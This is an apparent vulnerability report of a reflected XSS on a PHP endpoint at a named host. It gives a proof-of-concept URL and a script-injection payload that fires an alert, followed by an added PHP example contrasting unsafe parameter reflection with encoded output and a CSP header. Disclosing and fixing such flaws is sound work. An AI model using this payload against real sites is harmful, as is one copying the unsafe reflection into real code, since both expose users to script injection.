Greetings, I found an XSS on one of the Wikipedia server endpoints.
The attacker could run JavaScript in the victim's account right after the authentication process.
POC Steps:
1 - Open the URL http://wikipedia.ramselehof.de/wawewewi.php?project=
2 - Append a JavaScript payload after the equals sign; the alert will then fire, e.g.:
("></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>)
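For the fix side, here is an added example (not the reporter's code and not the site's actual wawewewi.php, whose source is unknown) showing the unsafe reflection of the `project` parameter that the report describes next to the encoded version; the function names and the input markup are assumptions for illustration.

```php
<?php
// Added example: a minimal handler that reflects the ?project= parameter.
// The real endpoint's code is unknown; this only mirrors the reflection
// pattern that the report describes (assumed markup and function names).

// UNSAFE: echoing the raw query parameter into HTML lets a crafted value
// close the surrounding attribute/tag and inject its own <script> element.
function render_project_unsafe(string $project): string
{
    return '<input type="text" name="project" value="' . $project . '">';
}

// FIXED: encode for the HTML attribute context before reflecting.
// ENT_QUOTES covers both " and ', ENT_HTML5 targets modern HTML output,
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
function render_project_safe(string $project): string
{
    $encoded = htmlspecialchars(
        $project,
        ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE,
        'UTF-8'
    );
    return '<input type="text" name="project" value="' . $encoded . '">';
}

// Defence in depth: a CSP without 'unsafe-inline' stops an injected inline
// script from executing even if an encoding bug slips through elsewhere.
// header() must be sent before any output.
header("Content-Security-Policy: default-src 'self'; script-src 'self'");

$project = $_GET['project'] ?? '';
echo render_project_safe($project);
// With the payload from the report, the safe version emits it as inert text
// beginning &quot;&gt;&lt;/SCRIPT&gt; ... so no new element is created.
```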